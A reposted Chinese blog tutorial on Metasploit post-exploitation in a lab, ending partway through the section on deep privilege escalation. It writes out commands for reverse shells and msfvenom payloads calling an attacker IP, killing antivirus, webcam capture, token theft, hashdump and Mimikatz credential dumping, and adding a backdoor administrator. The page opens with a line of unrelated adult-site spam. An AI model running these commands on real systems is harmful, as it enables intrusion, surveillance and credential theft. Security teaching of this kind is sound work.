日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

[系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解

發布時間:2024/6/1 windows 66 豆豆
生活随笔 收集整理的這篇文章主要介紹了 [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

您可能之前看到過我寫的類似文章,為什么還要重復撰寫呢?只是想更好地幫助初學者了解病毒逆向分析和系統安全,更加成體系且不破壞之前的系列。因此,我重新開設了這個專欄,準備系統整理和深入學習系統安全、逆向分析和惡意代碼檢測,“系統安全”系列文章會更加聚焦,更加系統,更加深入,也是作者的慢慢成長史。換專業確實挺難的,逆向分析也是塊硬骨頭,但我也試試,看看自己未來四年究竟能將它學到什么程度,漫漫長征路,偏向虎山行。享受過程,一起加油~

前文帶領大家了解Metasploit技術,它和CS都是APT攻擊中常見的方式,并結合作者之前的漏洞利用及WannaCry逆向經驗總結。這篇文章繼續帶領大家深入Metasploit技術,涉及后滲透相關的技術,包括信息收集、權限提權、移植漏洞模塊和后門。同時,結合作者之前的漏洞利用及WannaCry逆向經驗總結。本文參考徐焱老師的《Web安全攻防滲透測試實戰指南》著作,謝公子博客,并結合作者之前的博客和經驗進行總結。希望這篇文章對您有所幫助,這些大佬是真的值得我們去學習,獻上小弟的膝蓋~fighting!

文章目錄

  • 一.MSF漏洞利用
  • 二.后滲透攻擊之信息收集
    • 1.進程遷移
    • 2.系統命令
    • 3.文件系統命令
  • 三.后滲透攻擊之權限提升
    • 1.權限查詢
    • 2.利用WMIC實戰MS16-032本地溢出漏洞
    • 3.令牌竊取提權
    • 4.Hash攻擊提權
  • 四.后滲透攻擊之移植自定義漏洞利用模塊
    • 1.傳統MS08-067漏洞利用
    • 2.移植github的MS17-010漏洞模塊
    • 3.深度提權
  • 五.后滲透攻擊之后門
    • 1.操作系統Cymothoa后門
    • 2.Web后門
  • 六.總結

希望這些基礎原理能更好地幫助大家做好防御和保護,基礎性文章,希望對您有所幫助。作者作為網絡安全的小白,分享一些自學基礎教程給大家,主要是在線筆記,希望您們喜歡。同時,更希望您能與我一起操作和進步,后續將深入學習網絡安全和系統安全知識并分享相關實驗。總之,希望該系列文章對博友有所幫助,寫文不易,大神們不喜勿噴,謝謝!如果文章對您有幫助,將是我創作的最大動力,點贊、評論、私聊均可,一起加油喔!

作者的github資源:

  • 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
  • 網絡安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study

從2019年7月開始,我來到了一個陌生的專業——網絡空間安全。初入安全領域,是非常痛苦和難受的,要學的東西太多、涉及面太廣,但好在自己通過分享100篇“網絡安全自學”系列文章,艱難前行著。感恩這一年相識、相知、相趣的安全大佬和朋友們,如果寫得不好或不足之處,還請大家海涵!

接下來我將開啟新的安全系列,叫“系統安全”,也是免費的100篇文章,作者將更加深入的去研究惡意樣本分析、逆向分析、內網滲透、網絡攻防實戰等,也將通過在線筆記和實踐操作的形式分享與博友們學習,希望能與您一起進步,加油~

  • 推薦前文:網絡安全自學篇系列-100篇

前文分析:

  • [系統安全] 一.什么是逆向分析、逆向分析基礎及經典掃雷游戲逆向
  • [系統安全] 二.如何學好逆向分析及呂布傳游戲逆向案例
  • [系統安全] 三.IDA Pro反匯編工具初識及逆向工程解密實戰
  • [系統安全] 四.OllyDbg動態分析工具基礎用法及Crakeme逆向
  • [系統安全] 五.OllyDbg和Cheat Engine工具逆向分析植物大戰僵尸游戲
  • [系統安全] 六.逆向分析之條件語句和循環語句源碼還原及流程控制
  • [系統安全] 七.逆向分析之PE病毒原理、C++實現文件加解密及OllyDbg逆向
  • [系統安全] 八.Windows漏洞利用之CVE-2019-0708復現及藍屏攻擊
  • [系統安全] 九.Windows漏洞利用之MS08-067遠程代碼執行漏洞復現及深度提權
  • [系統安全] 十.Windows漏洞利用之SMBv3服務遠程代碼執行漏洞(CVE-2020-0796)復現
  • [系統安全] 十一.那些年的熊貓燒香及PE病毒行為機理分析
  • [系統安全] 十二.熊貓燒香病毒IDA和OD逆向分析(上)病毒初始化
  • [系統安全] 十三.熊貓燒香病毒IDA和OD逆向分析(中)病毒釋放機理
  • [系統安全] 十四.熊貓燒香病毒IDA和OD逆向分析–病毒釋放過程(下)
  • [系統安全] 十五.Chrome瀏覽器保留密碼功能滲透解析、藍屏漏洞及某音樂軟件漏洞復現
  • [系統安全] 十六.PE文件逆向基礎知識(PE解析、PE編輯工具和PE修改)
  • [系統安全] 十七.Windows PE病毒概念、分類及感染方式詳解
  • [系統安全] 十八.病毒攻防機理及WinRAR惡意劫持漏洞(腳本病毒、自啟動、定時關機、藍屏攻擊)
  • [系統安全] 十九.宏病毒之入門基礎、防御措施、自發郵件及APT28宏樣本分析
  • [系統安全] 二十.PE數字簽名之(上)什么是數字簽名及Signtool簽名工具詳解
  • [系統安全] 二十一.PE數字簽名之(中)Signcode、PEView、010Editor、Asn1View工具用法
  • [系統安全] 二十二.PE數字簽名之(下)微軟證書漏洞CVE-2020-0601復現及Windows驗證機制分析
  • [系統安全] 二十三.逆向分析之OllyDbg動態調試復習及TraceMe案例分析
  • [系統安全] 二十四.逆向分析之OllyDbg調試INT3斷點、反調試、硬件斷點與內存斷點
  • [系統安全] 二十五.WannaCry勒索病毒分析 (1)Python復現永恒之藍漏洞實現勒索加密
  • [系統安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及病毒解析
  • [系統安全] 二十七.WannaCry勒索病毒分析 (3)蠕蟲傳播機制解析及IDA和OD逆向
  • [系統安全] 二十八.WannaCry勒索病毒分析 (4)全網"最"詳細的蠕蟲傳播機制解讀
  • [系統安全] 二十九.深信服分享之外部威脅防護和勒索病毒對抗
  • [系統安全] 三十.CS逆向分析 (1)你的游戲子彈用完了嗎?Cheat Engine工具入門普及
  • [系統安全] 三十一.惡意代碼檢測(1)惡意代碼攻擊溯源及惡意樣本分析
  • [系統安全] 三十二.惡意代碼檢測(2)常用技術詳解及總結
  • [系統安全] 三十三.惡意代碼檢測(3)基于機器學習的惡意代碼檢測技術
  • [系統安全] 三十四.惡意代碼檢測(4)編寫代碼自動提取IAT表、字符串及時間戳溯源地區
  • [系統安全] 三十五.Procmon工具基本用法及文件進程、注冊表查看
  • [系統安全] 三十六.APT系列(1)APT攻擊溯源防御與常見APT組織的攻擊案例
  • [系統安全] 三十七.APT系列(2)遠控木馬詳解與防御及APT攻擊中的遠控
  • [系統安全] 三十八.APT系列(3)惡意代碼與APT攻擊中的武器(強推Seak老師)
  • [系統安全] 三十九.APT系列(4)APT攻防溯源普及和醫療數據安全防御總結
  • [系統安全] 四十.APT系列(5)APT組織常用WinRAR漏洞復現(CVE-2018-20250)及惡意軟件劫持
  • [系統安全] 四十一.APT系列(6)Python解析PE文件并獲取時間戳判斷來源區域
  • [系統安全] 四十二.APT系列(7)基于溯源圖的APT攻擊檢測安全頂會論文總結
  • [系統安全] 四十三.APT系列(8)Powershell和PowerSploit腳本滲透攻擊手段詳解
  • [系統安全] 四十四.APT系列(9)Metasploit技術之基礎用法萬字詳解及防御機理
  • [系統安全] 四十五.APT系列(10)Metasploit后滲透技術信息收集、權限提權和功能模塊詳解

聲明:本人堅決反對利用教學方法進行犯罪的行為,一切犯罪行為必將受到嚴懲,綠色網絡需要我們共同維護,更推薦大家了解它們背后的原理,更好地進行防護。


一.MSF漏洞利用

上一篇文章我們詳細介紹了Metasploit的基礎用法及漏洞利用過程,這篇文章將介紹后滲透相關的技術,包括信息收集、權限提升、移植漏洞和后門。在介紹這些知識之前,我們先簡單回顧下MSF漏洞利用的基本流程。

第一步,掃描靶機Windows XP系統是否開啟445端口。

  • nmap -sS 192.168.44.135

收集到目標主機相關信息后,為其選擇正確的Exploit和合適的Payload,然后發起攻擊。作者這里選擇Samba 3.x服務進行漏洞利用。

第二步,打開msfconsole。

  • msfconsole

第三步,查詢Samba的漏洞利用模塊,并選擇合適的漏洞利用模塊。

  • search samba

Samba是在Linux和UNIX系統上實現SMB(Server Message Block,信息服務塊)協議的一款免費軟件。SMB是一種在局域網上共享文件和打印機的通信協議,它在局域網內使用Linux和Windows系統的機器之間提供文件及打印機等資源的共享服務。

第四步,利用漏洞模塊。
在Samba服務返回的漏洞利用模塊列表中,我們選擇“Excellent”最杰出且時間較新的漏洞,從而提高滲透成功率。

  • use exploit/multi/samba/usermap_script

第五步,查看該漏洞利用模塊可供選擇的攻擊載荷模塊。
注意,因為目標是Linux機器,一定要選擇Linux的攻擊載荷。本文主要是回顧MSF漏洞攻擊流程,后面會詳細介紹真實的漏洞利用案例。

  • set payload cmd/unix/reverse

第六步,設置漏洞利用信息。

  • 受害主機IP:set RHOST 192.168.44.135
  • 攻擊主機IP:set LHOST 192.168.44.138
  • 攻擊端口:set RPORT 445

第七步,輸入攻擊命令exploit或run。

MSF發動攻擊成功后會獲取目標主機Shell,可以看到攻擊主機和目標主機之間建立了Shell連接。同時可能會出現錯誤“Exploit completed, but no session was created”,需要注意目標主機版本信息,選擇對應的攻擊載荷及漏洞利用模塊。建議讀者多嘗試各種Exploit和Payload的組合。

防御方法:

  • Samba服務漏洞發生在Samba3.0.20-25版本,當使用非默認用戶名映射腳本配置時,通過指定一個用戶名包含Shell元字符,攻擊者可以執行任意命令。建議將其升級到可防御的版本。
  • SMB局域網上共享文件和打印機的通信協議會出現各種漏洞,建議關閉相關的端口及防火墻設置,即使修補最新漏洞。


二.后滲透攻擊之信息收集

成功地對目標機器攻擊滲透后還可以做什么呢?
Metasploit提供了一個非常強大的后滲透工具—— Meterpreter,該工具具有多重功能,使后續入侵變得更容易,獲取目標機的Meterpreter Shell后,就進入了Metasploit最精彩的后滲透利用節點,后期滲透模塊有200多個,Meterpreter具有以下優勢。

  • 純內存工作模式,不需要對磁盤進行任何寫入操作。
  • 使用加密通信協議,而且可以同時與幾個信道通信。
  • 在被攻擊進程內工作,不需要創建新的進程。
  • 易于在多進程之間遷移。
  • 平臺通用,適用于Windows、Linux、 BSD系統, 并支持Intel x86和Intel x64平臺。

這里以上篇文章介紹的MS17-010漏洞為例進行說明。

同時,meterpreter的payload是真強大,它可以實現太多太多的功能了。我們可以在meterpreter下面進行help,查看相關用法。

  • Core Commands

  • File System Commands

  • Networking Commands & System Commands

  • User Interface Commands

  • Webcam Commands & Other Commands


1.進程遷移

在剛獲得Meterpreter Shell時,該Shell是極其脆弱和易受攻擊的,例如攻擊者可以利用瀏覽器漏洞攻陷目標機器,但攻擊滲透后瀏覽器有可能被用戶關閉。所以第一步就是要移動這個Shell,把它和目標機中一個穩定的進程綁定在一起,而不需要對磁盤進行任何寫入操作。這樣做使得滲透更難被檢測到。

(1) 獲取目標主機正在運行的進程

  • ps

這些進程與我們的目標主機如XP系統打開時對應的,如下圖所示。

(2) 查看Meterpreter Shell的進程號。

  • getpid

發現Meterpreter Shell進程的PID為524,Name為spoolsv.exe。


(3) 輸入命令移動進程。
輸入migrate命令把Shell移動到PID為1684的Explorer.exe進程里,因為該進程是一個穩定的應用。

  • migrate 1684

migrate也是一個post模塊,可以將meterpreter當前的進程移動到其他指定的進程中,這樣做的好處是可以給meterpreter一個相對穩定的運行環境,同時可以很好的躲避殺軟。

滲透過程中可能會遇到問題,比如“Error: Rex::TimeoutError : Operation timed out. ”,這都需要我們學會獨立解決。

完成進程遷移后,再次輸入getpid命令查看Meterpreter Shel的進程號,發現PID已經變成了2428,說明已經成功遷移到Explorer.exe進程里,原先PID為1116的進程會自動關閉,如圖所示。


(4) 使用自動遷移進程命令,系統會自動尋找合適的進程然后遷移。

  • run post/windows/manage/migrate

如下所示,系統已經把原來PID為3292的進程遷移到6020。

meterpreter > run post/windows/manage/migrate[*] Running module against DX1XMSTMBBJR3FZ [*] Current server process: notepad.exe (3292) [*] Spawning notepad.exe process to migrate to [+] Migrating to 6020 [+] Successfully migrated to process 6020

2.系統命令

獲得了穩定的進程后,接下來收集系統信息。后續作者想通過Python自己實現這些功能,感覺挺有意思的。

(1) 查看目標主機的系統信息。
通常會先輸入sysinfo命令查看目標機的系統信息,例如操作系統和體系結構。

  • sysinfo

(2) 檢查目標機是否運行在虛擬機上。

  • run post/windows/gather/checkvm

可以看到當前目標機正運行在一個VMware虛擬機上,接下來我們檢查虛擬機最近是否運行。

(3) 查看目標機最近的運行時間。

  • idletime

看到目標機器正在運行且運行了2 mins 49 secs。

(4) 查看目標機完整的網絡設置。

  • route

除此之外,可以輸入background命令將當前會話放到后臺,此命令適合在多個Meterpreter會話的場景下使用。


(5) 查看已經滲透成功的目標主機的用戶名。

  • getuid

(6) 關閉目標機操作系統殺毒軟件。

  • run post/windows/manage/killav

(7) 啟動目標機的遠程桌面協議,對應3389端口,后面我們會利用該端口。

  • run post/windows/manage/enable_rdp

(8) 查看目標機的本地子網情況。

  • run post/windows/manage/autoroute


可以通過添加路由借助被攻陷的主機對其他網絡的主機發送攻擊。同時可以添加路由信息。


(9) 列舉當前有多少用戶登陸了目標機。

  • run post/windows/gather/enum_logged_on_users

(10) 列舉完了用戶之后, 繼續輸入命令列舉安裝在目標機上的應用程序。

  • run post/windows/gather/enum_applications

(11) 查看自動登陸的用戶和密碼。

  • run windows/gather/credentials/windows_autologin

可以看到當前沒有抓到任何信息。此時就需要用到擴展插件Espia,使用前要先輸入load espia命令加載該插件,然后輸入screengrab命令就可以抓取此時目標機的屏幕截圖。


(12) 加載該插件截屏。

  • load espia
  • screengrab

另一個命令也可以達到同樣的截屏效果。抓取成功后就生成了一個jpeg圖片,保存在root目錄下。

  • screenshot

(13) 查看目標機camera。

  • webcam_list

(14) take photo。

  • webcam_snap

(15) 開啟模式。

  • webcam_stream

(16) 進入目標機shell。

  • shell

(17) 停止shell會話并返回meterpreter。

  • exit


3.文件系統命令

Meterpreter也支持各種文件系統命令,用于搜索文件并執行各種任務,例如搜索文件、下載文件及切換目錄等,相對來說操作比較簡單。常用的文件系統命令及其作用如下所示。

(1) 查看當前處于目標機的目錄。

  • pwd或getwd

(2) 查看當前處于本地的哪個目錄。

  • getlwd

(3) 列出當前目錄中的所有文件。

  • ls

(4) 切換目錄。

  • cd

(5) 搜索C盤中所有以".txt" 為擴展名的文件。

  • search -f *.txt -d c:\\

其中-f參數用于指定搜索文件模式,-d參數用于指定在哪個目錄下進行搜索,如圖所示。

(6) 下載目標機C盤的test.txt文件到攻擊機root下。

  • download c:\\test\\test.txt /root

(7) 上傳攻擊機root目錄下的test.txt文件到目標機C盤下。

  • upload /root/test.txt c:\\



三.后滲透攻擊之權限提升

1.權限查詢

在滲透過程中很有可能只獲得了一個系統的Guest或User權限。低的權限級別將使我們受到很多的限制,在實施橫向滲透或者提權攻擊時將很困難。

在主機上如果沒有管理員權限,就無法進行獲取Hash、安裝軟件、修改防火墻規則和修改注冊表等各種操作,所以必須將訪問權限從Guset提升到User,再到Administrator,最后到System級別。

滲透的最終目的是獲取服務器的最高權限,即Windows操作系統中管理員賬號的權限,或Linux操作系統中root賬戶的權限。提升權限的方式分為以下兩類。

  • 縱向提權: 低權限角色獲得高權限角色的權限。例如,一個WebShell權限通過提權之后擁有了管理員的權限,那么這種提權就是縱向提權,也稱作權限升級。
  • 橫向提權: 獲取同級別角色的權限。例如,通過已經攻破的系統A獲取了系統B的權限,那么這種提權就屬于橫向提權。

所以在成功獲取目標機Meterpreter Shell后,我們要知道現在已經擁有了什么權限。

(1) 查看當前權限。
在Meterpreter Shell下輸入shell命令進入目標機的CMD命令行,接著輸入whoami /groups命令查看我們當前的權限。

  • whoami

注意,如果提示whoami不是內部命令,則需要將whoami.exe復制到System32目錄即可。

查看我們當前的權限。

  • whoami /groups

(2) 查看用戶已獲得的權限。
作者這里使用MS17-010漏洞提權,已經是系統管理員權限了。

  • getuid

通過getsystem命令可以嘗試提權。

(3) 查看系統的已打補。
傳統的方法是在目標機的CMD命令行下輸入systeminfo命令,或者通過查詢C:\windows\里留下的補丁號".Iog" 查看目標機大概打了哪些補丁,如圖所示。

  • systeminfo

可以看到目標機只安裝了3個修補程序。

meterpreter命令如下:

(4) 利用WMIC命令列出已安裝的補丁。

  • Wmic qfe get Caption,Description,HotFixID,InstalledOn

注意,作者這里沒有顯示詳細信息,而徐老師他們顯示詳細信息如下圖所示。

可以看到目標機只打了3個補丁,要注意這些輸出的結果是不能被直接利用的,使用的方式是去找提權的EXP,然后將系統已經安裝的補丁編號與提權的EXP編號進行對比。比如KiTrap0D (KB979682) 、MS11-011 (KB2393802) 、MS11-080(KB2592799),然后使用沒有編號的EXP進行提權。

因為虛擬機不怎么打補丁,所以我們可以使用很多EXP來提權,這里就用最新的MS16-032來嘗試提權,對應的編號是KB3139914。

WMIC是Windows Management Instrumentation Command-line的簡稱,它是一款命令行管理工具,提供了從命令行接口到批命令腳本執行系統管理的支持,可以說是Windows平臺下最有用的命令行工具。使用WMIC我們不但可以管理本地計算機,還可以管理同一域內的所有遠程計算機(需要必要的權限),而被管理的遠程計算機不必事先安裝WMIC。

需要注意的是,在Windows XP下,低權限用戶是不能使用WMIC命令的,但是在Windows 7系統和Windows 8系統下,低權限用戶可以使用WMIC且不用更改任何設置。WMIC在信息收集和后滲透測試階段非常實用,可以調取查看目標機的進程、服務、用戶、用戶組、網絡連接、硬盤信息、網絡共享信息、已安裝補丁、啟動項、已安裝的軟件、操作系統的相關信息和時區等。


2.利用WMIC實戰MS16-032本地溢出漏洞

下面我們就利用本地溢出漏洞來提高權限,也就是說通過運行些現成的、能造成溢出漏洞的Exploit,把用戶從User組或其他系統用戶組中提升到Administrator組或root。

溢出漏洞就像往杯子里裝水,水多了杯子裝不進去,里面的水就會溢出來。而計算機有個地方叫緩存區,程序的緩存區長度是事先被設定好的,如果用戶輸入的數據超過了這個緩存區的長度,那么這個程序就會溢出。

(1) 接下來準備提權,需要先把Meterpreter會話轉為后臺執行,然后搜索MS16-032,如下圖所示。

  • search ms16-032

(2) 指定session完成提權操作。

  • use windows/local/ms16_032_secondary_logon_handle_privesc
  • set session 1

(3) 實現攻擊。

  • run

注意,如果搜索不到最新的Exploit,可以輸入msfupdate命令進行升級,獲取最新的Exploit模塊、攻擊載荷,或者手動添加相應漏洞EXP 。但是作者的始終沒有響應,真實的運行結果是將權限提升為System級別。

防御方式:

  • 該漏洞的安全補丁編號為KB3139914,我們只需要安裝此補丁即可。為了方便提權,下面給出部分補丁編號。

微軟也會定期給出對應的方法,比如:

  • Microsoft 安全公告 MS08-067 - 嚴重


3.令牌竊取提權

令牌(Token)是系統的臨時密鑰,相當于賬戶名和密碼,用來決定是否允許這次請求和判斷這次請求是屬于哪一個用戶的。它允許你在不提供密碼或其他憑證的前提下,訪問網絡和系統資源。這些令牌將持續存在于系統中,除非系統重新啟動。

令牌最大的特點就是隨機性、不可預測,一般hk或軟件無法猜測出來。令牌有很多種,比如:

  • 訪問令牌(Access Token): 表示訪問控制操作主題的系統對象;
  • 密保令牌(Security token): 又叫作認證令牌或者硬件令牌,是一種計算機身份校驗的物理設備,例如U盾;
  • 會話令牌(Session Token): 是交互會話中唯一的身份標識符。

在假冒令牌攻擊中需要使用Kerberost協議。所以在使用假冒令牌前,先來介紹Kerberost協議。Kerberos是一種網絡認證協議,其設計目標是通過密鑰系統為客戶機/服務器應用程序提供強大的認證服務。Kerberos的工作機制如下圖所示。

前面我們通過MS17-010已經實現權限提升,但已經是System級權限。但某些情況下可能是Test權限,需要進一步提升。

(1) 查看已經獲得的權限。

  • getuid

(2) 提權。

  • getsystem

發現提權失敗了。

(3) 列出可用的token。

  • use incognito
  • list_tokens -u

可以看到有兩種類型的令牌:

  • 一種是Delegation Tokens,也就是授權令牌,它支持交互式登錄,例如可以通過遠程桌面登錄訪問);
  • 一種是Impersonation Tokens,也就是模擬令牌,它是非交互的會話。令牌的數量其實取決于Meterpreter Shell的訪問級別。

由上圖可以看到,我們已經獲得了一個系統管理員hacker的授權令牌,現在就要假冒這個令牌,成功后即可擁有它的權限。

從輸出的信息可以看到分配的有效令牌包含 XI....NQ\hacker,其中XI…NQ是目標機的主機名,hacker表示登錄的用戶名。接下來在incognito中調用impersonate token命令假冒ge用戶進行攻擊,具體方法如下圖所示。

  • impersonate token XI...NQ\\hacker
  • shell
  • whoami

注意:在輸入HOSTNAME\USERNAME時需要兩個反斜杠(\\)。運行成功后在Meterpreter Shell下運行shell命令并輸入whoami,可以看到現在就是假冒的那個hacker系統管理員了。


4.Hash攻擊提權

Hashdump Meterpreter腳本可以從目標機器中提取Hash值,破解Hash值即可獲得登錄密碼。計算機中的每個賬號(如果是域服務器,則為域內的每個賬號)的用戶名和密碼都存儲在 sam 文件中,當計算機運行時,該文件對所有賬號進行鎖定,要
想訪問就必須有"系統級”賬號。所以要使用該命令就必須進行權限的提升。

(1) hashdump抓取密碼
在Meterpreter Shell提示符下輸入hashdump命令,將導出目標機sam數據庫中的Hash。注意,在非system權限下會出現失敗,報錯 “priv_passwd get_sam_hashes: Operation failed: The parameter is incorrect.”

  • hashdump

注意,在非SYSTEM權限下遠行hashdump命令會失敗,而且在Windows 7、Windows Server 2008下有時候會出現進程移植不成功等問題。權限不夠需要提升為system權限。查看權限可以進入目標機的 cmd 運行 whoami /groups 來查看。

(2) 如果報錯,則提權并將進程轉移至具有SYSTEM權限的進程。

  • ps
  • getsystem
  • migrate 664

(3) 導出目標機sam數據庫中的Hash。

  • hashdump

(4) smart hashdump導出用戶的Hash值。
另一個模塊smart hashdump的功能更為強大,可以導出域所有用戶的Hash,其工作流程如下:

  • 檢查Meterpreter會話的權限和目標機操作系統類型。
  • 檢查目標機是否為域控制服務器。
  • 首先嘗試從注冊表中讀取Hash,不行的話再嘗試注入LSASS進程。

命令為:

  • run windows/gather/smart_hashdump

(5) 通過暴力或者彩虹列表對抓取到的hash進行破解。

  • https://www.cmd5.com/

說明:在SAM文件中保存了兩個不同的口令信息,LAN Manager(LM)口令散列算法和更加強大的加密NT版。LM就是NT口令文件的弱點。上圖中左邊為LM版本口令,右邊是NTLM版本,1001代表管理員。


(6) 使用Quarks PwDump抓取密碼
PwDump是一款Win32環境下的系統授權信息導出工具,目前沒有任何一款工具可以導出如此全面的信息、支持這么多的OS版本,而且相當穩定。它目前可以導出:

  • Local accounts NT/LM hashes + history 本機NT/LM哈希+歷史登錄記錄。
  • Domain accounts NT/LM hashes + history域中的NT/LM哈希+歷史登錄記錄。
  • Cached domain password緩存中的域管理密碼。
  • Bitlocker recovery information使用Bitlocker的恢復功能后遺留的信息(恢復密碼&關鍵包)。

運行該程序如上圖所示,默認顯示幫助信息,其參數含義如下所示。

  • -dhl:導出本地哈希值。
  • -dhdc:導出內存中的域控哈希值。
  • -dhd:導出域控哈希值,必須指定NTDS文件。
  • -db:導出Bitlocker信息, 必須指定NTDS文件。
  • -nt:導出NTDS文件。
  • -hist:導出歷史信息,可選項。
  • -t:可選導出類型,默認導出John類型。
  • -o:導出文件到本地。

這里使用該工具抓取本機Hash值并導出,可以輸入如下命令導出本地哈希值到當前目錄的1.txt。此外,該工具還可以配合Ntdsutil工具導出域控密碼。

  • QuarksPwDump.exe -dhl -o 1.txt

(7) 使用WCE抓取密碼。
Windows Credentials Editor (WCE)是一款功能強大的Windows平臺內網滲透工具,它能列舉登錄會話,并且可以添加、改變和刪除相關憑據,如LM/NTHash。這些功能在內網滲透中能夠被利用,例如在Windows平臺上執行繞過Hash操作或者從內存中獲取NT/LM Hash (也可以從交互式登錄、服務、遠程桌面連接中獲取)以用于進一步的攻擊,而且體積也非常小,是內網滲透時的必備工具。不過必須在管理員權限下使用,還要注意殺毒工具的免殺。

首先輸入upload命令將wce.exe.上傳到目標主機C盤中,然后在目標機Shell下輸入wce -w命令,便會成功提取系統明文管理員的密碼,如圖所示。

另一款工具是Mimikatz,作為一款輕量級后滲透測試工具,它可以幫助安全測試人員輕松抓取系統密碼,此外還包括能夠通過獲取的Kerberos登錄憑據,繞過支持RestrictedAdmin模式下Windows 8或Windows Server 2012的遠程終端(RDP)等功能。后續實戰中我們遇到再詳細介紹。

同時,Mimikatz還能在PowerShell中執行,實現偷竊、注入憑證、偽造Kerberos票證創建,以及很多其他的功能。

輸入samdump命令查看samdump的可用選項抓取Hash。

  • mimikatz_command -f samdump::hashes



四.后滲透攻擊之移植自定義漏洞利用模塊

1.傳統MS08-067漏洞利用

首先,簡單看看傳統的漏洞利用方法。由于之前MS17-010漏洞已經復現過,所以這里使用MS08-067來加深讀者MSF用法的印象。

第一步,掃描靶機Windows XP系統是否開啟445端口。

  • nmap -sS 192.168.44.135

第二步,打開msfconsole。

  • msfconsole

第三步,查詢漏洞模塊。

  • search ms08-067

第四步,利用漏洞并設置參數。

  • use exploit/windows/smb/ms08_067_netapi
    利用永恒之藍漏洞
  • set payload windows/shell_reverse_tcp
    設置payload
  • set RHOSTS 192.168.44.135
    設置受害主機IP
  • set LHOST 192.168.44.138
    設置本機IP地址
  • set RPORT 445
    設置端口445

第五步,查看配合參數。

  • show options

注意,默認target是自動的。

第六步,利用漏洞。

  • exploit或run

此時可能會報錯“Exploit comleted, but no session was created”。這是需要根據靶機版本選擇合適的targets,例如這里是靶機系統為:Windows XP,則只需加一行如下命令:

  • set target 2

最終漏洞利用成功。

輸出后滲透相關命令,可以進行剩余操作。


2.移植github的MS17-010漏洞模塊

2017年5月12日,WannaCry蠕蟲通過永恒之藍MS17-010漏洞在全球范圍大爆發,感染大量的計算機。WannaCry勒索病毒全球大爆發,至少150個國家、30萬名用戶中招,造成損失達80億美元,已影響金融、能源、醫療、教育等眾多行業,造成嚴重的危害。

WannaCry是一種“蠕蟲式”勒索病毒軟件,由不法分子利用NSA泄露方程式工具包的危險漏洞“EternalBlue”(永恒之藍)進行傳播。該蠕蟲感染計算機后會向計算機中植入敲詐者病毒,導致電腦大量文件被加密。

WannaCry利用Windows系統的SMB漏洞獲取系統的最高權限,該工具通過惡意代碼掃描開放445端口的Windows系統。被掃描到的Windows系統,只要開機上線,不需要用戶進行任何操作,即可通過SMB漏洞上傳WannaCry勒索病毒等惡意程序。

WannaCry勒索病毒主要行為是傳播和勒索。

  • 傳播:利用基于445端口的SMB漏洞MS17-010(永恒之藍)進行傳播
  • 勒索:釋放文件,包括加密器、解密器、說明文件、語言文件等;加密文件;設置桌面背景、窗體信息及付款賬號等。

雖然MS17-010漏洞利用模塊Metasploit已經集成,但經過測試后被發現不支持某些操作系統,比如Windows 2003,但網上有支持的滲透腳本。并且真實的案例中,尤其是0day漏洞,我們需要自己構建shellcode攻擊腳本,所以這里我們講述一種普適性更強的漏洞利用方法,即移植漏洞模塊。

作者之前的文章也自己實現過。

  • Windows漏洞利用之Metasploit實現棧溢出攻擊及反彈shell
  • Windows漏洞利用之基于SEH異常處理機制的棧溢出攻擊及shell提取
  • Windows漏洞利用之構建ROP鏈繞過DEP并獲取Shell

(1) 下載漏洞利用模塊至本地或自己編寫相關Ruby腳本。

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

運行結果如下圖所示:

(2) 將 Eternalblue-Doublepulsar-Metasploit 文件夾下的rb文件復制到指定目錄。

  • /usr/share/metasploit-framework/modules/exploits/windows/smb

在Metasploit中,了解漏洞利用代碼模塊存儲的文件夾位置非常重要,不僅有助于尋找不同模塊的所在位置,也有助于讀者理解Metasploit框架的基本用法。

(3) MSF重新加載全部文件。

  • reload_all

(4) 搜索該腳本文件。

  • search eternalblue_doublepulsar

(5) 使用MSF自帶的Msfvenom命令生成DLL。
將MS17-010漏洞利用代碼移植到Metasploit框架后,就可以實現滲透操作。但在攻擊之前需要先生成一個DLL文件,如果目標主機是32位操作系統則生成32位的DLL,同理生成64位的DLL。這里涉及免殺,也可以使用PowerShell下的Empire生成DLL,后面文章介紹。

64: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.44.138 lport=4444 -f dll -o ~/eternal11.dll 32: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.44.138 -f dll -o ~/eternal11.dll

WannaCry和永恒之藍詳細原理,推薦大家閱讀我的逆向分析文章。

  • [網絡安全自學篇] 七十三.WannaCry勒索病毒復現及分析(四)蠕蟲傳播機制全網源碼詳細解讀

(6) 使用use命令加載該模塊及漏洞配置。

  • use exploit/windows/smb/eternalblue_doublepulsar

(7) 漏洞利用。

  • exploit

至此,我們攻擊成功。得到一個Meterpreter會話,如下圖所示。

防御建議:

  • 開啟系統防火墻
  • 關閉445、139等端口連接
  • 開啟系統自動更新,下載并更新補丁,及時修復漏洞
  • 為計算機安全最新補丁,微軟已經發布補丁MS17-010修復該漏洞,讀者也可以通過第三方工具下載補丁
  • 安裝安全軟件,開啟主動防御進行攔截查殺
  • 如非服務需要,建議把高危漏洞的端口都關閉,比如 135、137、138、139、445、3389 等
  • 開啟防火墻,及時備份重要文件


3.深度提權

接著我們需要進一步對目標XP主機進行深度提權。

(1) 增加普通用戶并提升至管理員權限。

  • 增加普通用戶
    net user hacker 123456 /add
  • 提升管理員權限
    net localgroup administrators hacker /add

Windows DOM用戶常用命令如下:

net user abcd 1234 /add 新建一個用戶名為abcd,密碼為1234的帳戶,默認為user組成員 net user abcd /del 將用戶名為abcd的用戶刪除 net user abcd /active:no 將用戶名為abcd的用戶禁用 net user abcd /active:yes 激活用戶名為abcd的用戶 net user abcd 查看用戶名為abcd的用戶的情況 net localgroup administrators abcd /add 將abcd賬戶給予管理員權限

此時被攻擊的主機新增“hacker”管理員如下圖所示:

(2) 開啟遠程連接3389端口并進行遠程操作。

